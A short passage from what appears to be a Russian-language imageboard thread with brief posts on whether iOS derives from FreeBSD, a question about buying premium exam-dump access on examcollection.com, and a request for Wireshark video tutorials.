А иос это такая перепиленная freebsd.

Ответы66812

20 янв, 20:44 724 1166812

>>66749
Скорее проприетарный unix.

22 янв, 12:50 725 1167504

Очень специфичный вопрос, но кто еще знает, если не ананас

Покупал ли кто-нибудь премиум на examcollection.com?
Вопрос простейший и хуйня, но нужна информация именно от купившего подписку или скачавшего премиум файл у них

Ответы67519

22 янв, 13:29 726 1167518

Посоветуйте какие-нибудь уроки по wireshark (желательно видео) с разбором всех ньансов

22 янв, 13:30 727 1167519

>>67504
.VCE, дамп экзамена и вот это всё

22 янв, 19:08 728 1167792